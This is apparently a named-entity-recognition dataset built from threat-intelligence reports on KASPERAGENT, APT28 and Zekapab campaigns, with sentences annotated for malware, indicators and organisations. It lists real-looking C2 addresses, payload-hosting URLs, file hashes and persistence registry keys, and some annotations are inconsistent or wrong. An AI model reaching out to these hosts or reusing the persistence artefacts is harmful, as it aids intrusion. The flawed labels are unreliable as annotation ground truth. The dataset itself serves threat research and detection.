{"text": "We didn\u2019t start out looking for KASPERAGENT , but a file hit on one of our YARA rules for an executable designed to display a fake XLS icon \u2013 one way adversaries attempt to trick targets into thinking a malicious file is innocuous .", "spans": [{"start": 32, "end": 43, "label": "Malware"}]}
{"text": "The first malicious sample we identified ( 6843AE9EAC03F69DF301D024BFDEFC88 ) had the file name \u201c testproj.exe \u201d", "spans": [{"start": 43, "end": 75, "label": "Indicator"}, {"start": 98, "end": 110, "label": "Indicator"}]}
{"text": "and was identified within an archive file ( 4FE7561F63A71CA73C26CB95B28EAEE8 ) with the name \u201c \u0627\u0644\u062a\u0641\u0627\u0635\u064a\u0644 \u0627\u0644\u0643\u0627\u0645\u0644\u0629 \u0644\u0623\u063a\u062a\u064a\u0627\u0644 \u0641\u0642\u0647\u0627\u0621.r24 \u201d .", "spans": [{"start": 44, "end": 76, "label": "Indicator"}, {"start": 95, "end": 129, "label": "Indicator"}]}
{"text": "This translates to \u201c The Complete Details of Fuqaha \u2019s Assassination \u201d", "spans": []}
{"text": ", a reference to Hamas military leader Mazen Fuqaha who was assassinated on March 24 , 2017 .", "spans": [{"start": 17, "end": 22, "label": "Organization"}]}
{"text": "We detonated the file in VxStream \u2019s automated malware analysis capability and found testproj.exe dropped a benign Microsoft Word document that pulls a jpg file from treestower.com .", "spans": [{"start": 25, "end": 33, "label": "System"}, {"start": 85, "end": 97, "label": "Indicator"}, {"start": 115, "end": 124, "label": "Organization"}, {"start": 125, "end": 129, "label": "System"}, {"start": 166, "end": 180, "label": "Indicator"}]}
{"text": "Malwr.com observed this site in association with another sample that called out to mailsinfo.net \u2013 a host identified in the Targeted Attacks in the Middle East Using KASPERAGENT and MICROPSIA blog .", "spans": [{"start": 0, "end": 9, "label": "Indicator"}, {"start": 83, "end": 96, "label": "Indicator"}, {"start": 166, "end": 177, "label": "Malware"}, {"start": 182, "end": 191, "label": "Malware"}]}
{"text": "That was our first hint that we were looking at KASPERAGENT .", "spans": [{"start": 48, "end": 59, "label": "Malware"}]}
{"text": "The jpg pulled from treestower.com displays a graphic picture of a dead man , which also appeared on a Palestinian news website discussing the death of Hamas military leader Mazen Fuqaha .", "spans": [{"start": 20, "end": 34, "label": "Indicator"}, {"start": 152, "end": 157, "label": "Organization"}]}
{"text": "A separate malicious executable \u2013 2DE25306A58D8A5B6CBE8D5E2FC5F3C5 ( vlc.exe ) \u2013 runs when the photograph is displayed , using the YouTube icon and calling out to several URLs on windowsnewupdates.com .", "spans": [{"start": 34, "end": 66, "label": "Indicator"}, {"start": 69, "end": 76, "label": "Indicator"}, {"start": 131, "end": 143, "label": "System"}, {"start": 179, "end": 200, "label": "Indicator"}]}
{"text": "This host was registered in late March and appears to be unique to this campaign .", "spans": []}
{"text": "With our interest piqued , we pivoted on the import hashes ( also known as an imphash ) , which captures the import table of a given file .", "spans": []}
{"text": "Shared import hashes across multiple files would likely identify files that are part of the same malware family .", "spans": []}
{"text": "We found nine additional samples sharing the imphash values for the two executables , C66F88D2D76D79210D568D7AD7896B45 and DCF3AA484253068D8833C7C5B019B07 .", "spans": [{"start": 86, "end": 118, "label": "Indicator"}, {"start": 123, "end": 154, "label": "Indicator"}]}
{"text": "Analysis of those files uncovered two more imphashes , 0B4E44256788783634A2B1DADF4F9784 and E44F0BD2ADFB9CBCABCAD314D27ACCFC , for a total of 20 malicious files .", "spans": [{"start": 55, "end": 87, "label": "Indicator"}, {"start": 92, "end": 124, "label": "Indicator"}]}
{"text": "These additional samples behaved similarly to the initial files ;", "spans": []}
{"text": "testproj.exe dropped benign decoy files and started malicious executables .", "spans": [{"start": 0, "end": 12, "label": "Indicator"}]}
{"text": "The malicious executables all called out to the same URLs on windowsnewupdates.com .", "spans": [{"start": 61, "end": 82, "label": "Indicator"}]}
{"text": "These malware samples leverage the user agent string \u201c OPAERA \u201d , the same one identified in the Targeted Attacks in the Middle East Using KASPERAGENT and MICROPSIA blog .", "spans": [{"start": 139, "end": 150, "label": "Malware"}, {"start": 155, "end": 164, "label": "Malware"}]}
{"text": "Although the command and control domain was different from those in the report , the POST and GET requests were similar and included / dad5 / in the URL string .", "spans": []}
{"text": "In addition , the malware samples included the kasper PDB string reported by Unit 42 , prompting us to conclude that we were likely looking at new variants of KASPERAGENT .", "spans": [{"start": 77, "end": 84, "label": "Organization"}, {"start": 159, "end": 170, "label": "Malware"}]}
{"text": "Several of the decoy files appeared to be official documents associated with the Palestinian Authority \u2013 the body that governs the Palestinian Territories in the Middle East .", "spans": [{"start": 81, "end": 102, "label": "Organization"}]}
{"text": "We do not know whether the files are legitimate Palestinian Authority documents , but they are designed to look official .", "spans": [{"start": 48, "end": 69, "label": "Organization"}]}
{"text": "Additionally , most of the decoy files are publicly available on news websites or social media .", "spans": []}
{"text": "The first document \u2013 dated April 10 , 2017 \u2013 is marked \u201c Very Secret \u201d", "spans": []}
{"text": "and addressed to Yahya Al-Sinwar , who Hamas elected as its leader in Gaza in February 2017 .", "spans": [{"start": 39, "end": 44, "label": "Organization"}]}
{"text": "Like the photo displayed in the first decoy file we found , this document references the death of Mazen Fuqaha .", "spans": []}
{"text": "The Arabic-language text and English translation of the document are available in ThreatConnect here .", "spans": [{"start": 82, "end": 95, "label": "Organization"}]}
{"text": "A screenshot of the file is depicted below .", "spans": []}
{"text": "The second legible file , dated April 23 , has the same letterhead and also is addressed to Yahya al-Sinwar .", "spans": []}
{"text": "This file discusses the supposed announcement banning the rival Fatah political party , which controls the West Bank , from Gaza .", "spans": [{"start": 64, "end": 69, "label": "Organization"}]}
{"text": "It mentions closing the Fatah headquarters and houses that were identified as meeting places as well as the arrest of some members of the party .", "spans": [{"start": 24, "end": 29, "label": "Organization"}]}
{"text": "We don\u2019t know for sure who is responsible for this campaign , but digging into the passive DNS results led us to some breadcrumbs .", "spans": [{"start": 91, "end": 94, "label": "Indicator"}]}
{"text": "Starting with 195.154.110.237 , the IP address which is hosting the command and control domain windowsnewupdates.com , we found that the host is on a dedicated server .", "spans": [{"start": 14, "end": 29, "label": "Indicator"}, {"start": 95, "end": 116, "label": "Indicator"}]}
{"text": "Using our Farsight DNSDB integration , we identified other domains currently and previously hosted on the same IP .", "spans": [{"start": 10, "end": 18, "label": "Organization"}, {"start": 19, "end": 24, "label": "System"}]}
{"text": "Two of the four domains that have been hosted at this IP since 2016 \u2014 upfile2box.com and 7aga.net \u2014 were registered by a freelance web developer in Gaza , Palestine .", "spans": [{"start": 70, "end": 84, "label": "Indicator"}, {"start": 89, "end": 97, "label": "Indicator"}]}
{"text": "This IP has been used to host a small number of domains , some of which were registered by the same actor , suggesting the IP is dedicated for a single individual or group \u2019s use .", "spans": []}
{"text": "While not conclusive , it is intriguing that the same IP was observed hosting a domain ostensibly registered in Gaza AND the command and control domain associated with a series of targeted attacks leveraging Palestinian Authority -themed decoy documents referencing Gaza .", "spans": [{"start": 208, "end": 229, "label": "Organization"}]}
{"text": "Just like we can\u2019t make a definitive determination as to who conducted this campaign , we do not know for sure who it was intended to target .", "spans": []}
{"text": "What we do know is that several of the malicious files were submitted to a public malware analysis site from the Palestinian Territories .", "spans": []}
{"text": "This tells us that it is possible either the threat actors or at least one of the targets is located in that area .", "spans": []}
{"text": "Additionally , as previously mentioned , the decoy document subject matter would likely be of interest to a few different potential targets in the Palestinian Territories .", "spans": []}
{"text": "Potential targets such as Hamas who controls the Gaza strip and counts Mazen Fuqaha and Yahya al-Sinwar as members , Israel which is accused of involvement in the assassination of Mazen Fuqaha , and the Fatah party of which the Prime Minister and President of the Palestinian Authority are members .", "spans": [{"start": 26, "end": 31, "label": "Organization"}, {"start": 203, "end": 214, "label": "Organization"}, {"start": 264, "end": 285, "label": "Organization"}]}
{"text": "The campaign corresponds with a period of heightened tension in Gaza .", "spans": []}
{"text": "Hamas , who has historically maintained control over the strip , elected Yahya al-Sinwar \u2013 a hardliner from its military wing \u2013 as its leader in February .", "spans": [{"start": 0, "end": 5, "label": "Organization"}]}
{"text": "A Humanitarian Bulletin published by the United Nations \u2019 Office for the Coordination of Humanitarian Affairs indicates in March 2017 ( just before the first malware samples associated with this campaign were identified in early April ) Hamas created \u201c a parallel institution to run local ministries in Gaza , \u201d", "spans": [{"start": 41, "end": 64, "label": "Organization"}, {"start": 73, "end": 109, "label": "Organization"}, {"start": 237, "end": 242, "label": "Organization"}]}
{"text": "further straining the relationship between Hamas and the Palestinian Authority who governs the West Bank .", "spans": [{"start": 43, "end": 48, "label": "Organization"}, {"start": 57, "end": 78, "label": "Organization"}]}
{"text": "After this announcement , the Palestinian Authority cut salaries for its employees in Gaza by 30 percent and informed Israel that it would no longer pay for electricity provided to Gaza causing blackouts throughout the area and escalating tensions between the rival groups .", "spans": [{"start": 30, "end": 51, "label": "Organization"}]}
{"text": "Then , in early May ( two days after the last malware sample was submitted ) the Palestinian Authority held local elections in the West Bank which were reportedly seen as a test for the Fatah party .", "spans": [{"start": 81, "end": 102, "label": "Organization"}, {"start": 186, "end": 197, "label": "Organization"}]}
{"text": "Elections were not held in Gaza .", "spans": []}
{"text": "All of that is to say , the decoy documents leveraged in this campaign would likely be relevant and of interest to a variety of targets in Israel and Palestine , consistent with previously identified KASPERAGENT targeting patterns .", "spans": [{"start": 200, "end": 211, "label": "Malware"}]}
{"text": "Additionally , the use of what appear to be carefully crafted documents at the very least designed to look like official government correspondence suggests the malware may have been intended for a government employee or contractor who would be interested in the documents \u2019 subject matter .", "spans": []}
{"text": "APT28 : New Espionage Operations Target Military and Government Organizations .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 40, "end": 77, "label": "Organization"}]}
{"text": "Recent campaigns see APT28 group return to covert intelligence gathering operations in Europe and South America .", "spans": [{"start": 21, "end": 26, "label": "Organization"}]}
{"text": "After making headlines during 2016 due to its involvement in cyber attacks against an organization involved in the U.S. presidential election , APT28 ( aka Swallowtail , Fancy Bear ) has continued to mount operations during 2017 and 2018 .", "spans": [{"start": 120, "end": 141, "label": "Organization"}, {"start": 144, "end": 149, "label": "Organization"}, {"start": 156, "end": 167, "label": "Organization"}, {"start": 170, "end": 180, "label": "Organization"}]}
{"text": "The espionage group , which according to the U.S. Department of Homeland Security ( DHS ) and the Federal Bureau of Investigation ( FBI ) is linked to the Russian government , returned to low-key intelligence-gathering operations during 2017 and into 2018 , targeting a range of military and government targets in Europe and South America .", "spans": [{"start": 50, "end": 81, "label": "Organization"}, {"start": 84, "end": 87, "label": "Organization"}, {"start": 98, "end": 129, "label": "Organization"}, {"start": 132, "end": 135, "label": "Organization"}]}
{"text": "APT28 has been active since at least January 2007 but received public attention in a major way during 2016 when it was implicated in a series of cyber attacks in the run up to the U.S. presidential election .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 185, "end": 206, "label": "Organization"}]}
{"text": "Beginning in the Spring of 2016 , APT28 sent spear-phishing emails to political targets including members of the Democratic National Committee ( DNC ) .", "spans": [{"start": 34, "end": 39, "label": "Organization"}, {"start": 60, "end": 66, "label": "System"}, {"start": 113, "end": 142, "label": "Organization"}, {"start": 145, "end": 148, "label": "Organization"}]}
{"text": "These emails were designed to trick recipients into supposedly changing their email passwords on a fake webmail domain .", "spans": [{"start": 6, "end": 12, "label": "System"}, {"start": 78, "end": 83, "label": "System"}]}
{"text": "The attack group then used these stolen credentials to gain access to the DNC network , install malware , move across the network , and steal data , including a trove of emails .", "spans": [{"start": 74, "end": 77, "label": "Organization"}, {"start": 170, "end": 176, "label": "System"}]}
{"text": "The compromised information was later leaked online .", "spans": []}
{"text": "These election attacks signaled a change of tactics on the part of APT28 , moving away from their prior low-key intelligence gathering towards more overt activity , seemingly intended to destabilize and disrupt victim organizations and countries .", "spans": [{"start": 67, "end": 72, "label": "Organization"}]}
{"text": "The group was also responsible for the 2016 attack on the World Anti Doping Agency ( WADA ) and the leaking of confidential drug testing information .", "spans": [{"start": 58, "end": 82, "label": "Organization"}, {"start": 85, "end": 89, "label": "Organization"}]}
{"text": "In keeping with its shift to more overt tactics , the group appeared to publicly take credit for the attack , leaking the information on a website using the name \u201c Fancy Bears \u201d , an industry codename that was already widely used for the group .", "spans": [{"start": 164, "end": 175, "label": "Organization"}]}
{"text": "After receiving an unprecedented amount of attention in 2016 , APT28 has continued to mount operations during 2017 and 2018 .", "spans": [{"start": 63, "end": 68, "label": "Organization"}]}
{"text": "However , the group \u2019s activities since the beginning of 2017 have again become more covert and appear to be mainly motivated by intelligence gathering .", "spans": []}
{"text": "The organizations targeted by APT28 during 2017 and 2018 include :", "spans": [{"start": 30, "end": 35, "label": "Organization"}]}
{"text": "A well-known international organization Military targets in Europe Governments in Europe A government of a South American country An embassy belonging to an Eastern European country .", "spans": []}
{"text": "APT28 uses a number of tools to compromise its targets .", "spans": [{"start": 0, "end": 5, "label": "Organization"}]}
{"text": "The group \u2019s primary malware is Sofacy , which has two main components .", "spans": [{"start": 32, "end": 38, "label": "Malware"}]}
{"text": "Trojan.Sofacy ( also known as Seduploader ) performs basic reconnaissance on an infected computer and can download further malware .", "spans": [{"start": 0, "end": 13, "label": "Indicator"}, {"start": 30, "end": 41, "label": "Malware"}]}
{"text": "Backdoor.SofacyX ( also known as X-Agent ) is a second stage piece of malware , capable of stealing information from the infected computer .", "spans": [{"start": 0, "end": 16, "label": "Indicator"}, {"start": 33, "end": 40, "label": "Malware"}]}
{"text": "A Mac version of the Trojan also exists ( OSX.Sofacy ) .", "spans": [{"start": 2, "end": 5, "label": "System"}, {"start": 21, "end": 27, "label": "Malware"}, {"start": 42, "end": 52, "label": "Indicator"}]}
{"text": "APT28 has continued to develop its tools over the past two years .", "spans": [{"start": 0, "end": 5, "label": "Organization"}]}
{"text": "For example , Trojan.Shunnael ( aka X-Tunnel ) , malware used to maintain access to infected networks using an encrypted tunnel , underwent a rewrite to .NET .", "spans": [{"start": 14, "end": 29, "label": "Indicator"}, {"start": 36, "end": 44, "label": "Malware"}, {"start": 153, "end": 157, "label": "System"}]}
{"text": "In addition to this , as reported by our peers at ESET last week , the group has also begun using a UEFI ( Unified Extensible Firmware Interface ) rootkit known as Lojax .", "spans": [{"start": 50, "end": 54, "label": "Organization"}, {"start": 100, "end": 104, "label": "System"}, {"start": 107, "end": 144, "label": "System"}, {"start": 164, "end": 169, "label": "Malware"}]}
{"text": "Because the rootkit resides within a computer \u2019s flash memory , it allows the attackers to maintain a persistent presence on a compromised machine even if the hard drive is replaced or the operating system is reinstalled .", "spans": []}
{"text": "Symantec products block attempts to install Lojax with the detection name Trojan.Lojax .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 44, "end": 49, "label": "Malware"}, {"start": 74, "end": 86, "label": "Indicator"}]}
{"text": "Another attack group , Earworm ( aka Zebrocy ) , has been active since at least May 2016 and is involved in what appears to be intelligence gathering operations against military targets in Europe , Central Asia , and Eastern Asia .", "spans": [{"start": 23, "end": 30, "label": "Organization"}, {"start": 37, "end": 44, "label": "Organization"}]}
{"text": "The group uses spear-phishing emails to compromise its targets and infect them with malware .", "spans": [{"start": 30, "end": 36, "label": "System"}]}
{"text": "Earworm uses two malware tools .", "spans": [{"start": 0, "end": 7, "label": "Organization"}]}
{"text": "Trojan.Zekapab is a downloader component that is capable of carrying out basic reconnaissance functions and downloading additional malware to the infected computer .", "spans": [{"start": 0, "end": 14, "label": "Indicator"}]}
{"text": "Backdoor.Zekapab is installed on selected infected computers and is capable of taking screenshots , executing files and commands , uploading and downloading files , performing registry and file system operations , and carrying out system information tasks .", "spans": [{"start": 0, "end": 16, "label": "Indicator"}]}
{"text": "Earworm has also on occasion installed additional tools onto infected computers for the purposes of keylogging and password capture .", "spans": [{"start": 0, "end": 7, "label": "Organization"}]}
{"text": "During 2016 , Symantec observed some overlap between the command and control ( C&C ) infrastructure used by Earworm and the C&C infrastructure used by Grizzly Steppe ( the U.S. government code name for APT28 and related actors ) , implying a potential connection between Earworm and APT28 .", "spans": [{"start": 14, "end": 22, "label": "Organization"}, {"start": 57, "end": 76, "label": "System"}, {"start": 79, "end": 82, "label": "System"}, {"start": 108, "end": 115, "label": "Organization"}, {"start": 124, "end": 127, "label": "System"}, {"start": 202, "end": 207, "label": "Organization"}, {"start": 271, "end": 278, "label": "Organization"}, {"start": 283, "end": 288, "label": "Organization"}]}
{"text": "However , Earworm also appears to conduct separate operations from APT28 and thus Symantec tracks them as a distinct group .", "spans": [{"start": 10, "end": 17, "label": "Organization"}, {"start": 67, "end": 72, "label": "Organization"}, {"start": 82, "end": 90, "label": "Organization"}]}
{"text": "It is now clear that after being implicated in the U.S. presidential election attacks in late 2016 , APT28 was undeterred by the resulting publicity and continues to mount further attacks using its existing tools .", "spans": [{"start": 56, "end": 77, "label": "Organization"}, {"start": 101, "end": 106, "label": "Organization"}]}
{"text": "After its foray into overt and disruptive attacks in 2016 , the group has subsequently returned to its roots , mounting intelligence gathering operations against a range of targets .", "spans": []}
{"text": "This ongoing activity and the fact that APT28 continues to refine its toolset means that the group will likely continue to pose a significant threat to nation state targets .", "spans": [{"start": 40, "end": 45, "label": "Organization"}]}
{"text": "Symantec has had the following protections in place to protect customers against APT28 attacks :", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 81, "end": 86, "label": "Organization"}]}
{"text": "Trojan.Sofacy Backdoor.SofacyX Infostealer.Sofacy OSX.Sofacy Trojan.Shunnael Trojan.Lojax .", "spans": [{"start": 0, "end": 13, "label": "Malware"}, {"start": 14, "end": 30, "label": "Malware"}, {"start": 31, "end": 49, "label": "Malware"}, {"start": 50, "end": 60, "label": "Malware"}, {"start": 61, "end": 76, "label": "Malware"}, {"start": 77, "end": 89, "label": "Malware"}]}
{"text": "The following protections are in place to protect customers against Earworm attacks :", "spans": [{"start": 68, "end": 75, "label": "Organization"}]}
{"text": "Trojan.Zekapab Backdoor.Zekapab .", "spans": [{"start": 0, "end": 14, "label": "Malware"}, {"start": 15, "end": 31, "label": "Malware"}]}
{"text": "A BREXIT-themed lure document that delivers ZEKAPAB malware .", "spans": [{"start": 44, "end": 51, "label": "Malware"}]}
{"text": "SNAKEMACKEREL is an espionage-motivated cyber threat group , also known as Sofacy , Pawn Storm , Sednit , Fancy Bear , APT28 , Group 74 , Tsar Team , and Strontium .", "spans": [{"start": 0, "end": 13, "label": "Organization"}, {"start": 75, "end": 81, "label": "Organization"}, {"start": 84, "end": 94, "label": "Organization"}, {"start": 97, "end": 103, "label": "Organization"}, {"start": 106, "end": 116, "label": "Organization"}, {"start": 119, "end": 124, "label": "Organization"}, {"start": 127, "end": 135, "label": "Organization"}, {"start": 138, "end": 147, "label": "Organization"}, {"start": 154, "end": 163, "label": "Organization"}]}
{"text": "Both the British and Dutch governments have publicly attributed SNAKEMACKEREL activities to the Russian military intelligence service ( RIS ) and have linked specific cyberattacks to the group , including the targeting of the Organisation for the Prohibition of Chemical Weapons ( OPCW ) , the United Kingdom Defence and Science Technology Laboratory ( DSTL ) and the United Kingdom Foreign and Commonwealth Office ( FCO ) .", "spans": [{"start": 64, "end": 77, "label": "Organization"}, {"start": 96, "end": 133, "label": "Organization"}, {"start": 136, "end": 139, "label": "Organization"}, {"start": 226, "end": 278, "label": "Organization"}, {"start": 281, "end": 285, "label": "Organization"}, {"start": 294, "end": 350, "label": "Organization"}, {"start": 353, "end": 357, "label": "Organization"}, {"start": 368, "end": 414, "label": "Organization"}, {"start": 417, "end": 420, "label": "Organization"}]}
{"text": "According to the FBI , the SNAKEMACKEREL threat group \"is part of an ongoing campaign of cyber-enabled operations directed at the United States government and its citizens .", "spans": [{"start": 17, "end": 20, "label": "Organization"}, {"start": 27, "end": 40, "label": "Organization"}]}
{"text": "These cyber operations have included spear phishing campaigns targeting government organizations , critical infrastructure entities , think tanks , universities , political organizations , and corporations , leading to the theft of information .", "spans": []}
{"text": "The creation of this malicious document , coming on the same day that the UK government announced an initial agreed draft of the BREXIT agreement , suggests that SNAKEMACKEREL is a group that pays close attention to political affairs and is able to leverage the latest news headlines to develop lure documents to deliver firststage malware , such as Zekapab , to its intended targets .", "spans": [{"start": 162, "end": 175, "label": "Organization"}, {"start": 350, "end": 357, "label": "Malware"}]}
{"text": "The theme also reflects the targeting of the group which primarily focuses on NATO members , countries in Central Asia and those neighboring Russia .", "spans": [{"start": 78, "end": 82, "label": "Organization"}]}
{"text": "Despite the public reporting and government accusations , SNAKEMACKEREL remains highly active .", "spans": [{"start": 58, "end": 71, "label": "Organization"}]}
{"text": "It is behind a large number of cyberattacks targeting global aerospace and defense contractors , military units , political parties , the International Olympic Committee ( IOC ) , anti-doping agencies , government departments and various other verticals .", "spans": [{"start": 138, "end": 169, "label": "Organization"}, {"start": 172, "end": 175, "label": "Organization"}]}
{"text": "NATO and EU member countries , as well as the United States , are of particular interest to the group .", "spans": [{"start": 0, "end": 4, "label": "Organization"}, {"start": 9, "end": 11, "label": "Organization"}, {"start": 46, "end": 59, "label": "Organization"}]}
{"text": "SNAKEMACKEREL operations continue to be some of the most far-reaching and sophisticated cyber espionage and intelligence campaigns to date .", "spans": [{"start": 0, "end": 13, "label": "Organization"}]}
{"text": "This report provides a technical overview of a BREXIT-themed lure Microsoft Office document that is used to drop a Delphi version of the Zekapab first-stage malware which has been previously reported by iDefense analysts .", "spans": [{"start": 66, "end": 75, "label": "Organization"}, {"start": 76, "end": 82, "label": "Organization"}, {"start": 115, "end": 121, "label": "System"}, {"start": 137, "end": 144, "label": "Malware"}, {"start": 203, "end": 211, "label": "Organization"}]}
{"text": "However , additional research on the C2 server 109.248.148.42 revealed a new .NET version of Zekapab that is designed for the same purpose . iDefense analysts recently came across the following malicious document that is purportedly related to the recent BREXIT negotiations between the UK and the EU .", "spans": [{"start": 37, "end": 39, "label": "System"}, {"start": 47, "end": 61, "label": "Indicator"}, {"start": 77, "end": 81, "label": "System"}, {"start": 93, "end": 100, "label": "Malware"}, {"start": 141, "end": 149, "label": "Organization"}, {"start": 298, "end": 300, "label": "Organization"}]}
{"text": "Brexit 15.11.2018.docx :", "spans": [{"start": 0, "end": 22, "label": "Indicator"}]}
{"text": "405655be03df45881aa88b55603bef1d .", "spans": [{"start": 0, "end": 32, "label": "Indicator"}]}
{"text": "Of note , the Company name Grizli777 is indicative of a cracked version of Microsoft Word .", "spans": [{"start": 27, "end": 36, "label": "Organization"}, {"start": 75, "end": 84, "label": "Organization"}, {"start": 85, "end": 89, "label": "System"}]}
{"text": "To trick the targeted individual into enabling macros , the attackers deliberately used jumbled-up text as content .", "spans": []}
{"text": "The document loads malicious content from http://109.248.148.42/office/thememl/2012/main/attachedTemplate.dotm via the settings.xml.rels component that is embedded within the DOCX document .", "spans": [{"start": 42, "end": 110, "label": "Indicator"}, {"start": 119, "end": 136, "label": "Indicator"}, {"start": 175, "end": 179, "label": "System"}]}
{"text": "The downloaded macro component includes a function called AutoClose() as well as two payloads embedded via Base64 encoded strings .", "spans": []}
{"text": "Research on the malicious IP address 109.248.148.42 revealed two different .dotm components :", "spans": [{"start": 37, "end": 51, "label": "Indicator"}, {"start": 75, "end": 80, "label": "Indicator"}]}
{"text": "Filename : attachedTemplate.dotm MD5 : 018611b879b2bbd886e86b62484494da Filename : templates.dotm MD5 : 2a794b55b839b3237482098957877326 .", "spans": [{"start": 11, "end": 32, "label": "Indicator"}, {"start": 39, "end": 71, "label": "Indicator"}, {"start": 83, "end": 97, "label": "Indicator"}, {"start": 104, "end": 136, "label": "Indicator"}]}
{"text": "The two components are dropped from the following URLs respectively :", "spans": []}
{"text": "http://109.248.148.42/office/thememl/2012/main/attachedTemplate.dotm http://109.248.148.42/officeDocument/2006/relationships/templates.dotm .", "spans": [{"start": 0, "end": 68, "label": "Indicator"}, {"start": 69, "end": 139, "label": "Indicator"}]}
{"text": "Both components contain an identical VBA macro code as shown above , each containing two different embedded payloads : one is an executable binary file and the other is a .docm file . attachedTemplate.dotm dropped the following :", "spans": [{"start": 37, "end": 40, "label": "System"}, {"start": 171, "end": 176, "label": "Indicator"}, {"start": 184, "end": 205, "label": "Indicator"}]}
{"text": "Filename : ntslwin.exe MD5 : 7e67122d3a052e4755b02965e2e56a2e Filename : ~de03fc12a.docm MD5 : 9d703d31795bac83c4dd90527d149796 . templates.dotm dropped the following :", "spans": [{"start": 11, "end": 22, "label": "Indicator"}, {"start": 29, "end": 61, "label": "Indicator"}, {"start": 73, "end": 88, "label": "Indicator"}, {"start": 95, "end": 127, "label": "Indicator"}, {"start": 130, "end": 144, "label": "Indicator"}]}
{"text": "Filename : ntslwin.exe MD5 : a13c864980159cd9bdc94074b2389dda Filename : ~de03fc12a.docm MD5 : 9d703d31795bac83c4dd90527d149796 .", "spans": [{"start": 11, "end": 22, "label": "Indicator"}, {"start": 29, "end": 61, "label": "Indicator"}, {"start": 73, "end": 88, "label": "Indicator"}, {"start": 95, "end": 127, "label": "Indicator"}]}
{"text": "The second macro file ~de03fc12a.docm dropped includes a simple macro to execute the dropped executable .", "spans": [{"start": 22, "end": 37, "label": "Indicator"}]}
{"text": "Analysis into the two binaries shows that they are in fact a Delphi ( initially UPX packed ) and .NET version of the Zekapab first-stage malware .", "spans": [{"start": 61, "end": 67, "label": "System"}, {"start": 80, "end": 83, "label": "System"}, {"start": 97, "end": 101, "label": "System"}, {"start": 117, "end": 124, "label": "Malware"}]}
{"text": "The following network traffic is performed by the Delphi sample which has the following metadata once unpacked by UPX :", "spans": [{"start": 50, "end": 56, "label": "System"}, {"start": 114, "end": 117, "label": "System"}]}
{"text": "Filename : ntslwin.exe MD5 : f4cab3a393462a57639faa978a75d10a .", "spans": [{"start": 11, "end": 22, "label": "Indicator"}, {"start": 29, "end": 61, "label": "Indicator"}]}
{"text": "Exhibit 4 shows the network traffic generated by the sample , a http POST request containing the system information collected .", "spans": [{"start": 64, "end": 68, "label": "Indicator"}]}
{"text": "On the other hand , the network traffic generated by the .NET version is unencoded .", "spans": [{"start": 57, "end": 61, "label": "System"}]}
{"text": "Both versions are designed to collect system information and running processes and send them to the designated C2 server using http POST to the URI used in both cases is /agr-enum/progress-inform/cube.php?res= .", "spans": [{"start": 111, "end": 113, "label": "System"}, {"start": 127, "end": 131, "label": "Indicator"}]}
{"text": "If the system is deemed interesting , the next stage malware would be delivered into corresponding directories .", "spans": []}
{"text": "The second-stage malware is delivered to different destinations with an autorun registry key set respectively .", "spans": []}
{"text": "For the Delphi version , the following registry key and value are used for persistence :", "spans": [{"start": 8, "end": 14, "label": "System"}]}
{"text": "Key : HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\AudioMgr Value : %AppData%\\Video\\videodrv.exe .", "spans": [{"start": 74, "end": 102, "label": "Indicator"}]}
{"text": "For the .NET version , the following registry key and value are used for persistence :", "spans": [{"start": 8, "end": 12, "label": "System"}]}
{"text": "Key : HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\GoogleIndexer Value : %AppData%\\Platform\\sslwin.exe .", "spans": [{"start": 79, "end": 108, "label": "Indicator"}]}
{"text": "The list of information collected includes :", "spans": []}
{"text": "Results from the commands systeminfo and tasklist Current execution path Capture screenshot Drive enumeration Drive serial number .", "spans": []}
{"text": "The code for downloading and executing the next stage malware .", "spans": []}
{"text": "As shown , the delivery of the next-stage malware is dependent on the information collected .", "spans": []}
{"text": "To mitigate the threat described in this report , iDefense recommends blocking access to the IP address and URI pattern :", "spans": [{"start": 50, "end": 58, "label": "Organization"}]}
{"text": "109.248.148.42 /agr-enum/progress-inform/cube.php?res= .", "spans": [{"start": 0, "end": 14, "label": "Indicator"}]}
{"text": "For threat hunting , iDefense recommends searching for the following :", "spans": []}
{"text": "Network : Presence of http and DNS traffic to the network IOCs shared above .", "spans": [{"start": 22, "end": 26, "label": "Indicator"}, {"start": 31, "end": 34, "label": "Indicator"}]}
{"text": "System : Presence of the following artifacts .", "spans": []}
{"text": "Persistence mechanism Registry Key :", "spans": []}
{"text": "Key : HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\AudioMgr Key : HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\GoogleIndexer .", "spans": []}
{"text": "On disk artefacts File with the full path : %AppData%\\Video\\videodrv.exe File with the full path : %AppData%\\Platform\\sslwin.exe Files with following file hashes .", "spans": [{"start": 44, "end": 72, "label": "Indicator"}, {"start": 99, "end": 128, "label": "Indicator"}]}
{"text": "\u201c Cyber Conflict \u201d Decoy Document Used In Real Cyber Conflict .", "spans": []}
{"text": "Cisco Talos discovered a new malicious campaign from the well known actor Group 74 ( aka Tsar Team , Sofacy , APT28 , Fancy Bear ) .", "spans": [{"start": 74, "end": 82, "label": "Organization"}, {"start": 89, "end": 98, "label": "Organization"}, {"start": 101, "end": 107, "label": "Organization"}, {"start": 110, "end": 115, "label": "Organization"}, {"start": 118, "end": 128, "label": "Organization"}]}
{"text": "Ironically the decoy document is a deceptive flyer relating to the Cyber Conflict U.S. conference .", "spans": []}
{"text": "CyCon US is a collaborative effort between the Army Cyber Institute at the United States Military Academy and the NATO Cooperative Cyber Military Academy and the NATO Cooperative Cyber Defence Centre of Excellence .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 47, "end": 67, "label": "Organization"}, {"start": 75, "end": 105, "label": "Organization"}, {"start": 114, "end": 118, "label": "Organization"}, {"start": 119, "end": 153, "label": "Organization"}, {"start": 162, "end": 166, "label": "Organization"}, {"start": 167, "end": 213, "label": "Organization"}]}
{"text": "Due to the nature of this document , we assume that this campaign targets people with an interest in cyber security .", "spans": []}
{"text": "Unlike previous campaigns from this actor , the flyer does not contain an Office exploit or a 0-day , it simply contains a malicious Visual Basic for Applications ( VBA ) macro .", "spans": [{"start": 133, "end": 162, "label": "System"}, {"start": 165, "end": 168, "label": "System"}]}
